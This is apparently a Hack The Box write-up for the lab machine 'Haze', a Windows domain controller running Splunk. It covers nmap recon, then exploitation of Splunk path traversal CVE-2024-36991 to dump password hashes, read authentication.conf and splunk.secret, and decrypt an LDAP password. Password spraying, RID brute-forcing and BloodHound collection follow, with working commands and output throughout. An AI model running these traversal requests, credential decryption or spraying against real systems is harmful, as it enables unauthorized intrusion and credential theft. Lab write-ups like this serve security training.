🧠 HTB Write-Up: Haze
Difficulty: Hard
OS: Linux
Points: 30
Date: 2025-04-07
🔍 Reconnaissance
🔎 Nmap Scan Results
Command Used:
nmap -sV -sC 10.129.232.42 -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-07 20:50:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after: 2026-03-05T07:12:20
| MD5: db18:a1f5:986c:1470:b848:35ec:d437:1ca0
|_SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after: 2026-03-05T07:12:20
| MD5: db18:a1f5:986c:1470:b848:35ec:d437:1ca0
|_SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after: 2026-03-05T07:12:20
| MD5: db18:a1f5:986c:1470:b848:35ec:d437:1ca0
|_SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after: 2026-03-05T07:12:20
| MD5: db18:a1f5:986c:1470:b848:35ec:d437:1ca0
|_SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
8000/tcp open http Splunkd httpd
|_http-favicon: Unknown favicon MD5: E60C968E8FF3CC2F4FB869588E83AFC6
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Splunkd
| http-robots.txt: 1 disallowed entry
|_/
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://dc01.haze.htb:8000/en-US/account/login?return_to=%2Fen-US%2F
8088/tcp open ssl/http Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:29:08
| Not valid after: 2028-03-04T07:29:08
| MD5: 82e5:ba5a:c723:2f49:6f67:395b:5e64:ed9b
|_SHA-1: e859:76a6:03da:feef:c1ab:9acf:ecc7:fd75:f1e5:1ab2
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: 404 Not Found
| http-methods:
|_ Supported Methods: GET POST HEAD OPTIONS
8089/tcp open ssl/http Splunkd httpd
|_http-title: splunkd
|_http-server-header: Splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:29:08
| Not valid after: 2028-03-04T07:29:08
| MD5: 82e5:ba5a:c723:2f49:6f67:395b:5e64:ed9b
|_SHA-1: e859:76a6:03da:feef:c1ab:9acf:ecc7:fd75:f1e5:1ab2
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-04-07T20:51:00
|_ start_date: N/A
Target Host: 10.129.232.42 (dc01.haze.htb)
Host OS: Likely Windows Server (Domain Controller)
🟢 Open Ports and Services:
| Port | Service | Version / Notes |
|---|---|---|
| 53 | DNS | Simple DNS Plus |
| 88 | Kerberos-sec | Microsoft Windows Kerberos |
| 135 | MSRPC | Remote Procedure Call |
| 139 | NetBIOS-SSN | SMB legacy support |
| 389 | LDAP | AD LDAP (Domain: haze.htb) |
| 445 | Microsoft-DS | SMB - Likely Active Directory |
| 464 | kpasswd5? | Kerberos Password Change |
| 593 | ncacn_http | RPC over HTTP |
| 636 | LDAPS | Secure LDAP (AD) |
| 3268 | LDAP GC | AD Global Catalog |
| 3269 | LDAPS GC | Secure Global Catalog |
| 8000 | HTTP | Splunk Web Interface (login page) |
| 8088 | HTTPS | Splunkd (API endpoint) |
| 8089 | HTTPS | Splunkd (Mgmt/Service endpoint) |
🧠 Observations:
-
This host is a Windows Active Directory Domain Controller (
dc01.haze.htb) -
Multiple LDAP/Kerberos services confirm AD environment
-
Splunk appears to be running on ports
8000,8088, and8089 -
Identified Splunk Version 9.2.1 via port
8089: https://i.imgur.com/Ynqo6Fr.png
🌐 Enumeration
🔹 Interface Access
- Navigated to:
http://haze.htb:8000→ Splunk Web Login Page - Splunk Management available on:
https://haze.htb:8088https://haze.htb:8089
- 📸 Screenshot:
⚠️ Vulnerability Identified
-
CVE-2024-36991 – Path Traversal in Splunk
- Affects versions < 9.2.2 (Windows)
- Exploitable via
/modules/messaging/endpoint - Allows arbitrary file read on the host
📸 PoC Search on GitHub:
🧪 Exploit Usage
python CVE-2024-36991.py -u http://haze.htb:8000/
[VLUN] Vulnerable: http://haze.htb:8000/
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:[email protected]:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::[email protected]:user:[email protected]:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:[email protected]:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:[email protected]:::20152
👥 Extracted Usernames (from Splunk config)
From the Splunk path traversal exploit output, the following potential user accounts were identified:
🛠️ Continued Exploitation – Splunk File Reads
Since the password hashes could not be cracked, the next logical step was to modify the CVE-2024-36991 exploit to read other sensitive files.
📄 Target: Splunk Configuration File
Goal: Identify Splunk’s installation path and pivot to read additional files.
Exploitation Path Used:
.../Program%20Files/Splunk/etc/splunk-launch.conf
📄 Read: splunk-launch.conf
File Content:
# Version 9.2.1
# Modify the following line to suit the location of your Splunk install.
# If unset, Splunk will use the parent of the directory containing the splunk CLI executable.
SPLUNK_HOME=C:\Program Files\Splunk
# By default, Splunk stores its indexes under SPLUNK_HOME in the var\lib\splunk subdirectory.
# This can be overridden here:
# SPLUNK_DB=C:\builds\splcore\main\build_home\splunk\var\lib\splunk
# Splunkd service name
SPLUNK_SERVER_NAME=Splunkd
PYTHONHTTPSVERIFY=0
PYTHONUTF8=1
📄 Read: authentication.conf
Request Used:
GET /en-US/modules/messaging/C%3A../C%3A../C%3A../C%3A../C%3A../etc/system/local/authentication.conf HTTP/1.1
Host: dc01.haze.htb:8000
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0
[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
host = dc01.haze.htb
port = 389
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname
Key Findings:
-
LDAP Auth Enabled (
authType = LDAP) -
Bind DN:
CN=Paul Taylor,CN=Users,DC=haze,DC=htb -
Encrypted Password
📄 Read: splunk.secret
To decrypt the LDAP bind password (bindDNpassword), Splunk uses a master key stored in splunk.secret.
Request Used:
GET /en-US/modules/messaging/C%3A../C%3A../C%3A../C%3A../C%3A../etc/auth/splunk.secret HTTP/1.1
Host: dc01.haze.htb:8000
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD
📌 Tool Required to Decrypt:
splunksecrets by HurricaneLabs
🔓 Decrypted LDAP Password – Paul Taylor
After retrieving both the encrypted password from authentication.conf and the splunk.secret master key, we successfully decrypted the LDAP credentials for Paul Taylor.
🔐 Ciphertext (from authentication.conf)
$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
#### 🧰 Tool Used
- [`splunksecrets`](https://github.com/HurricaneLabs/splunksecrets)
#### 🧪 Command Executed
splunksecrets splunk-decrypt -S splunk.secret
✅ Decrypted Result
Ld@p_Auth_Sp1unk@2k24
🎯 Initial Foothold
Used crackmapexec to test the credentials against SMB on the domain controller.
Command:
crackmapexec smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24'
SMB 10.129.232.42 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
Confirmed: Credentials are valid for domain user paul.taylor
After confirming access with paul.taylor, we performed RID brute-force enumeration against the Domain Controller to enumerate valid users.
🧪 Command:
crackmapexec smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep 'SidTypeUser'
500: HAZE\Administrator
501: HAZE\Guest
502: HAZE\krbtgt
1000: HAZE\DC01$
1103: HAZE\paul.taylor
1104: HAZE\mark.adams
1105: HAZE\edward.martin
1106: HAZE\alexander.green
1111: HAZE\Haze-IT-Backup$
You can see that there are several other users
After identifying additional domain users via RID brute-force, we performed password spraying to test for reused credentials.
🧪 Command:
crackmapexec smb haze.htb -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24'
Note: users.txt contains:
mark.adams
edward.martin
alexander.green
Haze-IT-Backup$
✅ Successful Login:
SMB 10.129.232.42 445 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
🕵️ Domain Recon – BloodHound Enumeration
After gaining valid domain credentials (mark.adams), we used BloodHound to enumerate Active Directory objects and relationships.
bloodhound-python -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -dc dc01.haze.htb -ns 10.129.232.42 -c all --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 8 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
INFO: Done in 00M 17S
INFO: Compressing output into 20250407173642_bloodhound.zip
🧠 Key Takeaways:
-
Successfully retrieved data from the domain controller (
dc01.haze.htb) -
Output saved as a ZIP file for analysis in BloodHound GUI